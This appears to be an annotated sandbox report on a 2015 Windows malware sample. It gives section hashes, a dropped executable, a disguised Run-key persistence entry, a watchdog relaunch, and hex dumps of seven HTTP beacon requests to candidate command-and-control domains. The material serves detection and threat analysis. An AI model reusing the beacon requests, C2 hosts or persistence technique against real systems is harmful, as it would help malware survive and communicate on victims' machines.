Analysis Date: 2015-05-14 03:26:25

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 2ed92e4e9218e0e0e41a654199dc0c43 sha1: beb6ae4ca4944dab0b908e1c78fa4c8ea8b6e136 size: 293376
Section .rdata — md5: a8a8fcc18a4c91ec617718f279c28b45 sha1: 44f987259ca321b9dfbad69d7e3e940f008ecfd2 size: 34304; a further section (its name was lost in extraction) — md5: 9fef3b804a7ca76e9608e533bb0f8f7f sha1: e85c9feccf70bdff418da369b52c54a18fa1fd5e size: 101376
Timestamp (PE header): 2014-10-30 09:46:12 — the header timestamp is trivially forged, so treat it as a hint about build date, not evidence.
Packer: Microsoft Visual C++ ?.? — this is a compiler signature (version not resolved) rather than a packer, which suggests an unpacked MSVC build; no section-entropy data is given here to confirm that.

Runtime Details:


↳ C:\malware.exe (the submitted sample, presumably renamed by the sandbox; the events below are attributed to this process)

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AuthIP File Awareness Tablet Provider ➝
C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe
(persistence: a per-user Run-key autostart entry pointing at the dropped executable. The value name strings together Windows-sounding terms, a common disguise; both the value name and the path are usable IOCs, though the folder and file names look randomly generated and may differ per infection.)
Creates File: C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe (an executable dropped into a random-looking subfolder of the user's Application Data and then launched — see the next line)
Creates Process: C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe

↳ C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\tvvdkozi\kyrtneoxa.exe (a second dropped executable; no launch of it is recorded in this trace)
Creates File: \Device\Afd\Endpoint (an object of the AFD kernel driver that backs Winsock — this means the process opened a network socket)
Creates File: C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.jh (a companion data file with a non-standard extension; its purpose is not determined here)
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe" (the dropped binary relaunches itself with a WATCHDOGPROC argument; the name suggests a watchdog instance that keeps the main process alive, in which case terminating a single process would not be sufficient for cleanup)

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\tvvdkozi\htzrjquszqng.exe" (third process in the chain; no further file or registry events are attributed to it in this trace, and the sandbox does not record which of the three processes produced the network traffic below)

Network Details (seven outbound TCP flows from consecutive source ports 1031–1037; the destination endpoint was not recorded, but the count matches the seven HTTP requests in the Raw Pcap below, so each flow appears to carry one of them):
Flows TCP: 192.168.1.1:1031 ➝ (destination not recorded)
Flows TCP: 192.168.1.1:1032 ➝ (destination not recorded)
Flows TCP: 192.168.1.1:1033 ➝ (destination not recorded)
Flows TCP: 192.168.1.1:1034 ➝ (destination not recorded)
Flows TCP: 192.168.1.1:1035 ➝ (destination not recorded)
Flows TCP: 192.168.1.1:1036 ➝ (destination not recorded)
Flows TCP: 192.168.1.1:1037 ➝ (destination not recorded)

Raw Pcap (decoded: seven HTTP/1.0 GET requests, each for /index.php?email=info@polymerprod.com&method=post&len with Connection: close, sent to a different host — chiefsupply.net, collegeoffice.net, middleoffice.net, rathersupply.net, weathersupply.net, weatheroffice.net, thinkcaught.net. The hard-coded email value and the valueless len parameter look like a check-in/beacon rather than user-driven traffic, and the two-word .net hostnames follow one pattern, so all seven are candidate C2 IOCs. Only requests are captured; no server response appears, so it is unknown whether any host resolved or answered.)
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206368 69656673   se..Host: chiefs
0x00000070 (00112)   7570706c 792e6e65 740d0a0d 0a         upply.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   656f6666 6963652e 6e65740d 0a0d0a     eoffice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206d69 64646c65   se..Host: middle
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a0a     office.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207261 74686572   se..Host: rather
0x00000070 (00112)   73757070 6c792e6e 65740d0a 0d0a0a     supply.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   72737570 706c792e 6e65740d 0a0d0a     rsupply.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   726f6666 6963652e 6e65740d 0a0d0a     roffice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d696e66 6f40706f 6c796d65   mail=info@polyme
0x00000020 (00032)   7270726f 642e636f 6d266d65 74686f64   rprod.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b63   se..Host: thinkc
0x00000070 (00112)   61756768 742e6e65 740d0a0d 0a0d0a     aught.net......

